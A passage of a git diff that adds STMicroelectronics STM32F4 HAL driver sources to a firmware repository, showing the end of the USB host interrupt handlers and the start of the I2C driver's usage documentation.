__HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_BBERR); + hhcd->hc[ch_num].state = HC_BBLERR; + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_ACK) == USB_OTG_HCINT_ACK) + { + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_ACK); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_STALL) == USB_OTG_HCINT_STALL) + { + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + hhcd->hc[ch_num].state = HC_STALL; + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_NAK); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_STALL); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_DTERR) == USB_OTG_HCINT_DTERR) + { + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + hhcd->hc[ch_num].state = HC_DATATGLERR; + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_NAK); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_DTERR); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_TXERR) == USB_OTG_HCINT_TXERR) + { + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + hhcd->hc[ch_num].state = HC_XACTERR; + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_TXERR); + } + else + { + /* ... */ + } + + if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_FRMOR) == USB_OTG_HCINT_FRMOR) + { + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_FRMOR); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_XFRC) == USB_OTG_HCINT_XFRC) + { + if (hhcd->Init.dma_enable != 0U) + { + hhcd->hc[ch_num].xfer_count = hhcd->hc[ch_num].XferSize - \ + (USBx_HC(ch_num)->HCTSIZ & USB_OTG_HCTSIZ_XFRSIZ); + } + + hhcd->hc[ch_num].state = HC_XFRC; + hhcd->hc[ch_num].ErrCnt = 0U; + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_XFRC); + + if ((hhcd->hc[ch_num].ep_type == EP_TYPE_CTRL) || + (hhcd->hc[ch_num].ep_type == EP_TYPE_BULK)) + { + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_NAK); + } + else if (hhcd->hc[ch_num].ep_type == EP_TYPE_INTR) + { + USBx_HC(ch_num)->HCCHAR |= USB_OTG_HCCHAR_ODDFRM; + hhcd->hc[ch_num].urb_state = URB_DONE; + +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) + hhcd->HC_NotifyURBChangeCallback(hhcd, (uint8_t)ch_num, hhcd->hc[ch_num].urb_state); +#else + HAL_HCD_HC_NotifyURBChange_Callback(hhcd, (uint8_t)ch_num, hhcd->hc[ch_num].urb_state); +#endif /* USE_HAL_HCD_REGISTER_CALLBACKS */ + } + else if (hhcd->hc[ch_num].ep_type == EP_TYPE_ISOC) + { + hhcd->hc[ch_num].urb_state = URB_DONE; + hhcd->hc[ch_num].toggle_in ^= 1U; + +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) + hhcd->HC_NotifyURBChangeCallback(hhcd, (uint8_t)ch_num, hhcd->hc[ch_num].urb_state); +#else + HAL_HCD_HC_NotifyURBChange_Callback(hhcd, (uint8_t)ch_num, hhcd->hc[ch_num].urb_state); +#endif /* USE_HAL_HCD_REGISTER_CALLBACKS */ + } + else + { + /* ... */ + } + + if (hhcd->Init.dma_enable == 1U) + { + if (((hhcd->hc[ch_num].XferSize / hhcd->hc[ch_num].max_packet) & 1U) != 0U) + { + hhcd->hc[ch_num].toggle_in ^= 1U; + } + } + else + { + hhcd->hc[ch_num].toggle_in ^= 1U; + } + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_CHH) == USB_OTG_HCINT_CHH) + { + __HAL_HCD_MASK_HALT_HC_INT(ch_num); + + if (hhcd->hc[ch_num].state == HC_XFRC) + { + hhcd->hc[ch_num].urb_state = URB_DONE; + } + else if (hhcd->hc[ch_num].state == HC_STALL) + { + hhcd->hc[ch_num].urb_state = URB_STALL; + } + else if ((hhcd->hc[ch_num].state == HC_XACTERR) || + (hhcd->hc[ch_num].state == HC_DATATGLERR)) + { + hhcd->hc[ch_num].ErrCnt++; + if (hhcd->hc[ch_num].ErrCnt > 2U) + { + hhcd->hc[ch_num].ErrCnt = 0U; + hhcd->hc[ch_num].urb_state = URB_ERROR; + } + else + { + hhcd->hc[ch_num].urb_state = URB_NOTREADY; + + /* re-activate the channel */ + tmpreg = USBx_HC(ch_num)->HCCHAR; + tmpreg &= ~USB_OTG_HCCHAR_CHDIS; + tmpreg |= USB_OTG_HCCHAR_CHENA; + USBx_HC(ch_num)->HCCHAR = tmpreg; + } + } + else if (hhcd->hc[ch_num].state == HC_NAK) + { + hhcd->hc[ch_num].urb_state = URB_NOTREADY; + + /* re-activate the channel */ + tmpreg = USBx_HC(ch_num)->HCCHAR; + tmpreg &= ~USB_OTG_HCCHAR_CHDIS; + tmpreg |= USB_OTG_HCCHAR_CHENA; + USBx_HC(ch_num)->HCCHAR = tmpreg; + } + else if (hhcd->hc[ch_num].state == HC_BBLERR) + { + hhcd->hc[ch_num].ErrCnt++; + hhcd->hc[ch_num].urb_state = URB_ERROR; + } + else + { + /* ... */ + } + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_CHH); + HAL_HCD_HC_NotifyURBChange_Callback(hhcd, (uint8_t)ch_num, hhcd->hc[ch_num].urb_state); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_NAK) == USB_OTG_HCINT_NAK) + { + if (hhcd->hc[ch_num].ep_type == EP_TYPE_INTR) + { + hhcd->hc[ch_num].ErrCnt = 0U; + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + } + else if ((hhcd->hc[ch_num].ep_type == EP_TYPE_CTRL) || + (hhcd->hc[ch_num].ep_type == EP_TYPE_BULK)) + { + hhcd->hc[ch_num].ErrCnt = 0U; + + if (hhcd->Init.dma_enable == 0U) + { + hhcd->hc[ch_num].state = HC_NAK; + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + } + } + else + { + /* ... */ + } + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_NAK); + } + else + { + /* ... */ + } +} + +/** + * @brief Handle Host Channel OUT interrupt requests. + * @param hhcd HCD handle + * @param chnum Channel number. + * This parameter can be a value from 1 to 15 + * @retval none + */ +static void HCD_HC_OUT_IRQHandler(HCD_HandleTypeDef *hhcd, uint8_t chnum) +{ + USB_OTG_GlobalTypeDef *USBx = hhcd->Instance; + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t ch_num = (uint32_t)chnum; + uint32_t tmpreg; + uint32_t num_packets; + + if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_AHBERR) == USB_OTG_HCINT_AHBERR) + { + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_AHBERR); + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_ACK) == USB_OTG_HCINT_ACK) + { + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_ACK); + + if (hhcd->hc[ch_num].do_ping == 1U) + { + hhcd->hc[ch_num].do_ping = 0U; + hhcd->hc[ch_num].urb_state = URB_NOTREADY; + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + } + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_FRMOR) == USB_OTG_HCINT_FRMOR) + { + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_FRMOR); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_XFRC) == USB_OTG_HCINT_XFRC) + { + hhcd->hc[ch_num].ErrCnt = 0U; + + /* transaction completed with NYET state, update do ping state */ + if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_NYET) == USB_OTG_HCINT_NYET) + { + hhcd->hc[ch_num].do_ping = 1U; + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_NYET); + } + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_XFRC); + hhcd->hc[ch_num].state = HC_XFRC; + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_NYET) == USB_OTG_HCINT_NYET) + { + hhcd->hc[ch_num].state = HC_NYET; + hhcd->hc[ch_num].do_ping = 1U; + hhcd->hc[ch_num].ErrCnt = 0U; + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_NYET); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_STALL) == USB_OTG_HCINT_STALL) + { + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_STALL); + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + hhcd->hc[ch_num].state = HC_STALL; + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_NAK) == USB_OTG_HCINT_NAK) + { + hhcd->hc[ch_num].ErrCnt = 0U; + hhcd->hc[ch_num].state = HC_NAK; + + if (hhcd->hc[ch_num].do_ping == 0U) + { + if (hhcd->hc[ch_num].speed == HCD_DEVICE_SPEED_HIGH) + { + hhcd->hc[ch_num].do_ping = 1U; + } + } + + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_NAK); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_TXERR) == USB_OTG_HCINT_TXERR) + { + if (hhcd->Init.dma_enable == 0U) + { + hhcd->hc[ch_num].state = HC_XACTERR; + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + } + else + { + hhcd->hc[ch_num].ErrCnt++; + if (hhcd->hc[ch_num].ErrCnt > 2U) + { + hhcd->hc[ch_num].ErrCnt = 0U; + hhcd->hc[ch_num].urb_state = URB_ERROR; + HAL_HCD_HC_NotifyURBChange_Callback(hhcd, (uint8_t)ch_num, + hhcd->hc[ch_num].urb_state); + } + else + { + hhcd->hc[ch_num].urb_state = URB_NOTREADY; + } + } + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_TXERR); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_DTERR) == USB_OTG_HCINT_DTERR) + { + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_NAK); + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_DTERR); + hhcd->hc[ch_num].state = HC_DATATGLERR; + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_CHH) == USB_OTG_HCINT_CHH) + { + __HAL_HCD_MASK_HALT_HC_INT(ch_num); + + if (hhcd->hc[ch_num].state == HC_XFRC) + { + hhcd->hc[ch_num].urb_state = URB_DONE; + if ((hhcd->hc[ch_num].ep_type == EP_TYPE_BULK) || + (hhcd->hc[ch_num].ep_type == EP_TYPE_INTR)) + { + if (hhcd->Init.dma_enable == 0U) + { + hhcd->hc[ch_num].toggle_out ^= 1U; + } + + if ((hhcd->Init.dma_enable == 1U) && (hhcd->hc[ch_num].xfer_len > 0U)) + { + num_packets = (hhcd->hc[ch_num].xfer_len + hhcd->hc[ch_num].max_packet - 1U) / hhcd->hc[ch_num].max_packet; + + if ((num_packets & 1U) != 0U) + { + hhcd->hc[ch_num].toggle_out ^= 1U; + } + } + } + } + else if (hhcd->hc[ch_num].state == HC_NAK) + { + hhcd->hc[ch_num].urb_state = URB_NOTREADY; + } + else if (hhcd->hc[ch_num].state == HC_NYET) + { + hhcd->hc[ch_num].urb_state = URB_NOTREADY; + } + else if (hhcd->hc[ch_num].state == HC_STALL) + { + hhcd->hc[ch_num].urb_state = URB_STALL; + } + else if ((hhcd->hc[ch_num].state == HC_XACTERR) || + (hhcd->hc[ch_num].state == HC_DATATGLERR)) + { + hhcd->hc[ch_num].ErrCnt++; + if (hhcd->hc[ch_num].ErrCnt > 2U) + { + hhcd->hc[ch_num].ErrCnt = 0U; + hhcd->hc[ch_num].urb_state = URB_ERROR; + } + else + { + hhcd->hc[ch_num].urb_state = URB_NOTREADY; + + /* re-activate the channel */ + tmpreg = USBx_HC(ch_num)->HCCHAR; + tmpreg &= ~USB_OTG_HCCHAR_CHDIS; + tmpreg |= USB_OTG_HCCHAR_CHENA; + USBx_HC(ch_num)->HCCHAR = tmpreg; + } + } + else + { + /* ... */ + } + + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_CHH); + HAL_HCD_HC_NotifyURBChange_Callback(hhcd, (uint8_t)ch_num, hhcd->hc[ch_num].urb_state); + } + else + { + /* ... */ + } +} + +/** + * @brief Handle Rx Queue Level interrupt requests. + * @param hhcd HCD handle + * @retval none + */ +static void HCD_RXQLVL_IRQHandler(HCD_HandleTypeDef *hhcd) +{ + USB_OTG_GlobalTypeDef *USBx = hhcd->Instance; + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t pktsts; + uint32_t pktcnt; + uint32_t GrxstspReg; + uint32_t xferSizePktCnt; + uint32_t tmpreg; + uint32_t ch_num; + + GrxstspReg = hhcd->Instance->GRXSTSP; + ch_num = GrxstspReg & USB_OTG_GRXSTSP_EPNUM; + pktsts = (GrxstspReg & USB_OTG_GRXSTSP_PKTSTS) >> 17; + pktcnt = (GrxstspReg & USB_OTG_GRXSTSP_BCNT) >> 4; + + switch (pktsts) + { + case GRXSTS_PKTSTS_IN: + /* Read the data into the host buffer. */ + if ((pktcnt > 0U) && (hhcd->hc[ch_num].xfer_buff != (void *)0)) + { + if ((hhcd->hc[ch_num].xfer_count + pktcnt) <= hhcd->hc[ch_num].xfer_len) + { + (void)USB_ReadPacket(hhcd->Instance, + hhcd->hc[ch_num].xfer_buff, (uint16_t)pktcnt); + + /* manage multiple Xfer */ + hhcd->hc[ch_num].xfer_buff += pktcnt; + hhcd->hc[ch_num].xfer_count += pktcnt; + + /* get transfer size packet count */ + xferSizePktCnt = (USBx_HC(ch_num)->HCTSIZ & USB_OTG_HCTSIZ_PKTCNT) >> 19; + + if ((hhcd->hc[ch_num].max_packet == pktcnt) && (xferSizePktCnt > 0U)) + { + /* re-activate the channel when more packets are expected */ + tmpreg = USBx_HC(ch_num)->HCCHAR; + tmpreg &= ~USB_OTG_HCCHAR_CHDIS; + tmpreg |= USB_OTG_HCCHAR_CHENA; + USBx_HC(ch_num)->HCCHAR = tmpreg; + hhcd->hc[ch_num].toggle_in ^= 1U; + } + } + else + { + hhcd->hc[ch_num].urb_state = URB_ERROR; + } + } + break; + + case GRXSTS_PKTSTS_DATA_TOGGLE_ERR: + break; + + case GRXSTS_PKTSTS_IN_XFER_COMP: + case GRXSTS_PKTSTS_CH_HALTED: + default: + break; + } +} + +/** + * @brief Handle Host Port interrupt requests. + * @param hhcd HCD handle + * @retval None + */ +static void HCD_Port_IRQHandler(HCD_HandleTypeDef *hhcd) +{ + USB_OTG_GlobalTypeDef *USBx = hhcd->Instance; + uint32_t USBx_BASE = (uint32_t)USBx; + __IO uint32_t hprt0; + __IO uint32_t hprt0_dup; + + /* Handle Host Port Interrupts */ + hprt0 = USBx_HPRT0; + hprt0_dup = USBx_HPRT0; + + hprt0_dup &= ~(USB_OTG_HPRT_PENA | USB_OTG_HPRT_PCDET | \ + USB_OTG_HPRT_PENCHNG | USB_OTG_HPRT_POCCHNG); + + /* Check whether Port Connect detected */ + if ((hprt0 & USB_OTG_HPRT_PCDET) == USB_OTG_HPRT_PCDET) + { + if ((hprt0 & USB_OTG_HPRT_PCSTS) == USB_OTG_HPRT_PCSTS) + { +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) + hhcd->ConnectCallback(hhcd); +#else + HAL_HCD_Connect_Callback(hhcd); +#endif /* USE_HAL_HCD_REGISTER_CALLBACKS */ + } + hprt0_dup |= USB_OTG_HPRT_PCDET; + } + + /* Check whether Port Enable Changed */ + if ((hprt0 & USB_OTG_HPRT_PENCHNG) == USB_OTG_HPRT_PENCHNG) + { + hprt0_dup |= USB_OTG_HPRT_PENCHNG; + + if ((hprt0 & USB_OTG_HPRT_PENA) == USB_OTG_HPRT_PENA) + { + if (hhcd->Init.phy_itface == USB_OTG_EMBEDDED_PHY) + { + if ((hprt0 & USB_OTG_HPRT_PSPD) == (HPRT0_PRTSPD_LOW_SPEED << 17)) + { + (void)USB_InitFSLSPClkSel(hhcd->Instance, HCFG_6_MHZ); + } + else + { + (void)USB_InitFSLSPClkSel(hhcd->Instance, HCFG_48_MHZ); + } + } + else + { + if (hhcd->Init.speed == HCD_SPEED_FULL) + { + USBx_HOST->HFIR = 60000U; + } + } +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) + hhcd->PortEnabledCallback(hhcd); +#else + HAL_HCD_PortEnabled_Callback(hhcd); +#endif /* USE_HAL_HCD_REGISTER_CALLBACKS */ + + } + else + { +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) + hhcd->PortDisabledCallback(hhcd); +#else + HAL_HCD_PortDisabled_Callback(hhcd); +#endif /* USE_HAL_HCD_REGISTER_CALLBACKS */ + } + } + + /* Check for an overcurrent */ + if ((hprt0 & USB_OTG_HPRT_POCCHNG) == USB_OTG_HPRT_POCCHNG) + { + hprt0_dup |= USB_OTG_HPRT_POCCHNG; + } + + /* Clear Port Interrupts */ + USBx_HPRT0 = hprt0_dup; +} + +/** + * @} + */ + +/** + * @} + */ + +#endif /* defined (USB_OTG_FS) || defined (USB_OTG_HS) */ +#endif /* HAL_HCD_MODULE_ENABLED */ + +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2c.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2c.c new file mode 100644 index 000000000..dfe5e6237 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_i2c.c @@ -0,0 +1,7524 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_i2c.c + * @author MCD Application Team + * @brief I2C HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Inter Integrated Circuit (I2C) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral State, Mode and Error functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The I2C HAL driver can be used as follows: + + (#) Declare a I2C_HandleTypeDef handle structure, for example: + I2C_HandleTypeDef hi2c; + + (#)Initialize the I2C low level resources by implementing the HAL_I2C_MspInit() API: + (##) Enable the I2Cx interface clock + (##) I2C pins configuration + (+++) Enable the clock for the I2C GPIOs + (+++) Configure I2C pins as alternate function open-drain + (##) NVIC configuration if you need to use interrupt process + (+++) Configure the I2Cx interrupt priority + (+++) Enable the NVIC I2C IRQ Channel + (##) DMA Configuration if you need to use DMA process + (+++) Declare a DMA_HandleTypeDef handle structure for the transmit or receive stream + (+++) Enable the DMAx interface clock using + (+++) Configure the DMA handle parameters + (+++) Configure the DMA Tx or Rx stream + (+++) Associate the initialized DMA handle to the hi2c DMA Tx or Rx handle + (+++) Configure the priority and enable the NVIC for the transfer complete interrupt on + the DMA Tx or Rx stream + + (#) Configure the Communication Speed, Duty cycle, Addressing mode, Own Address1, + Dual Addressing mode, Own Address2, General call and Nostretch mode in the hi2c Init structure. + + (#) Initialize the I2C registers by calling the HAL_I2C_Init(), configures also the low level Hardware + (GPIO, CLOCK, NVIC...etc) by calling the customized HAL_I2C_MspInit() API. + + (#) To check if target device is ready for communication, use the function HAL_I2C_IsDeviceReady() + + (#) For I2C IO and IO MEM operations, three operation modes are available within this driver : + + *** Polling mode IO operation *** + ================================= + [..] + (+) Transmit in master mode an amount of data in blocking mode using HAL_I2C_Master_Transmit() + (+) Receive in master mode an amount of data in blocking mode using HAL_I2C_Master_Receive() + (+) Transmit in slave mode an amount of data in blocking mode using HAL_I2C_Slave_Transmit() + (+) Receive in slave mode an amount of data in blocking mode using HAL_I2C_Slave_Receive() + + *** Polling mode IO MEM operation *** + ===================================== + [..] + (+) Write an amount of data in blocking mode to a specific memory address using HAL_I2C_Mem_Write() + (+) Read an amount of data in blocking mode from a specific memory address using HAL_I2C_Mem_Read() + + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Transmit in master mode an amount of data in non-blocking mode using HAL_I2C_Master_Transmit_IT() + (+) At transmission end of transfer, HAL_I2C_MasterTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MasterTxCpltCallback() + (+) Receive in master mode an amount of data in non-blocking mode using HAL_I2C_Master_Receive_IT() + (+) At reception end of transfer, HAL_I2C_MasterRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MasterRxCpltCallback() + (+) Transmit in slave mode an amount of data in non-blocking mode using HAL_I2C_Slave_Transmit_IT() + (+) At transmission end of transfer, HAL_I2C_SlaveTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_SlaveTxCpltCallback() + (+) Receive in slave mode an amount of data in non-blocking mode using HAL_I2C_Slave_Receive_IT() + (+) At reception end of transfer, HAL_I2C_SlaveRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_SlaveRxCpltCallback() + (+) In case of transfer Error, HAL_I2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_I2C_ErrorCallback() + (+) Abort a master I2C process communication with Interrupt using HAL_I2C_Master_Abort_IT() + (+) End of abort process, HAL_I2C_AbortCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_AbortCpltCallback() + + *** Interrupt mode or DMA mode IO sequential operation *** + ========================================================== + [..] + (@) These interfaces allow to manage a sequential transfer with a repeated start condition + when a direction change during transfer + [..] + (+) A specific option field manage the different steps of a sequential transfer + (+) Option field values are defined through I2C_XferOptions_definition and are listed below: + (++) I2C_FIRST_AND_LAST_FRAME: No sequential usage, functional is same as associated interfaces in no sequential mode + (++) I2C_FIRST_FRAME: Sequential usage, this option allow to manage a sequence with start condition, address + and data to transfer without a final stop condition + (++) I2C_FIRST_AND_NEXT_FRAME: Sequential usage (Master only), this option allow to manage a sequence with start condition, address + and data to transfer without a final stop condition, an then permit a call the same master sequential interface + several times (like HAL_I2C_Master_Seq_Transmit_IT() then HAL_I2C_Master_Seq_Transmit_IT() + or HAL_I2C_Master_Seq_Transmit_DMA() then HAL_I2C_Master_Seq_Transmit_DMA()) + (++) I2C_NEXT_FRAME: Sequential usage, this option allow to manage a sequence with a restart condition, address + and with new data to transfer if the direction change or manage only the new data to transfer + if no direction change and without a final stop condition in both cases + (++) I2C_LAST_FRAME: Sequential usage, this option allow to manage a sequance with a restart condition, address + and with new data to transfer if the direction change or manage only the new data to transfer + if no direction change and with a final stop condition in both cases + (++) I2C_LAST_FRAME_NO_STOP: Sequential usage (Master only), this option allow to manage a restart condition after several call of the same master sequential + interface several times (link with option I2C_FIRST_AND_NEXT_FRAME). + Usage can, transfer several bytes one by one using HAL_I2C_Master_Seq_Transmit_IT(option I2C_FIRST_AND_NEXT_FRAME then I2C_NEXT_FRAME) + or HAL_I2C_Master_Seq_Receive_IT(option I2C_FIRST_AND_NEXT_FRAME then I2C_NEXT_FRAME) + or HAL_I2C_Master_Seq_Transmit_DMA(option I2C_FIRST_AND_NEXT_FRAME then I2C_NEXT_FRAME) + or HAL_I2C_Master_Seq_Receive_DMA(option I2C_FIRST_AND_NEXT_FRAME then I2C_NEXT_FRAME). + Then usage of this option I2C_LAST_FRAME_NO_STOP at the last Transmit or Receive sequence permit to call the opposite interface Receive or Transmit + without stopping the communication and so generate a restart condition. + (++) I2C_OTHER_FRAME: Sequential usage (Master only), this option allow to manage a restart condition after each call of the same master sequential + interface. + Usage can, transfer several bytes one by one with a restart with slave address between each bytes using HAL_I2C_Master_Seq_Transmit_IT(option I2C_FIRST_FRAME then I2C_OTHER_FRAME) + or HAL_I2C_Master_Seq_Receive_IT(option I2C_FIRST_FRAME then I2C_OTHER_FRAME) + or HAL_I2C_Master_Seq_Transmit_DMA(option I2C_FIRST_FRAME then I2C_OTHER_FRAME) + or HAL_I2C_Master_Seq_Receive_DMA(option I2C_FIRST_FRAME then I2C_OTHER_FRAME). + Then usage of this option I2C_OTHER_AND_LAST_FRAME at the last frame to help automatic generation of STOP condition. + + (+) Different sequential I2C interfaces are listed below: + (++) Sequential transmit in master I2C mode an amount of data in non-blocking mode using HAL_I2C_Master_Seq_Transmit_IT() + or using HAL_I2C_Master_Seq_Transmit_DMA() + (+++) At transmission end of current frame transfer, HAL_I2C_MasterTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MasterTxCpltCallback() + (++) Sequential receive in master I2C mode an amount of data in non-blocking mode using HAL_I2C_Master_Seq_Receive_IT() + or using HAL_I2C_Master_Seq_Receive_DMA() + (+++) At reception end of current frame transfer, HAL_I2C_MasterRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MasterRxCpltCallback() + (++) Abort a master IT or DMA I2C process communication with Interrupt using HAL_I2C_Master_Abort_IT() + (+++) End of abort process, HAL_I2C_AbortCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_AbortCpltCallback() + (++) Enable/disable the Address listen mode in slave I2C mode using HAL_I2C_EnableListen_IT() HAL_I2C_DisableListen_IT() + (+++) When address slave I2C match, HAL_I2C_AddrCallback() is executed and user can + add his own code to check the Address Match Code and the transmission direction request by master (Write/Read). + (+++) At Listen mode end HAL_I2C_ListenCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_ListenCpltCallback() + (++) Sequential transmit in slave I2C mode an amount of data in non-blocking mode using HAL_I2C_Slave_Seq_Transmit_IT() + or using HAL_I2C_Slave_Seq_Transmit_DMA() + (+++) At transmission end of current frame transfer, HAL_I2C_SlaveTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_SlaveTxCpltCallback() + (++) Sequential receive in slave I2C mode an amount of data in non-blocking mode using HAL_I2C_Slave_Seq_Receive_IT() + or using HAL_I2C_Slave_Seq_Receive_DMA() + (+++) At reception end of current frame transfer, HAL_I2C_SlaveRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_SlaveRxCpltCallback() + (++) In case of transfer Error, HAL_I2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_I2C_ErrorCallback() + + *** Interrupt mode IO MEM operation *** + ======================================= + [..] + (+) Write an amount of data in non-blocking mode with Interrupt to a specific memory address using + HAL_I2C_Mem_Write_IT() + (+) At Memory end of write transfer, HAL_I2C_MemTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MemTxCpltCallback() + (+) Read an amount of data in non-blocking mode with Interrupt from a specific memory address using + HAL_I2C_Mem_Read_IT() + (+) At Memory end of read transfer, HAL_I2C_MemRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MemRxCpltCallback() + (+) In case of transfer Error, HAL_I2C_ErrorCallback() function is executed and user can + add his own code by customization of function pointer HAL_I2C_ErrorCallback() + + *** DMA mode IO operation *** + ============================== + [..] + (+) Transmit in master mode an amount of data in non-blocking mode (DMA) using + HAL_I2C_Master_Transmit_DMA() + (+) At transmission end of transfer, HAL_I2C_MasterTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MasterTxCpltCallback() + (+) Receive in master mode an amount of data in non-blocking mode (DMA) using + HAL_I2C_Master_Receive_DMA() + (+) At reception end of transfer, HAL_I2C_MasterRxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_MasterRxCpltCallback() + (+) Transmit in slave mode an amount of data in non-blocking mode (DMA) using + HAL_I2C_Slave_Transmit_DMA() + (+) At transmission end of transfer, HAL_I2C_SlaveTxCpltCallback() is executed and user can + add his own code by customization of function pointer HAL_I2C_SlaveTxCpltCallback() + (+) Receive in slave mode an amount of data in non-blocking mode (DMA) using + 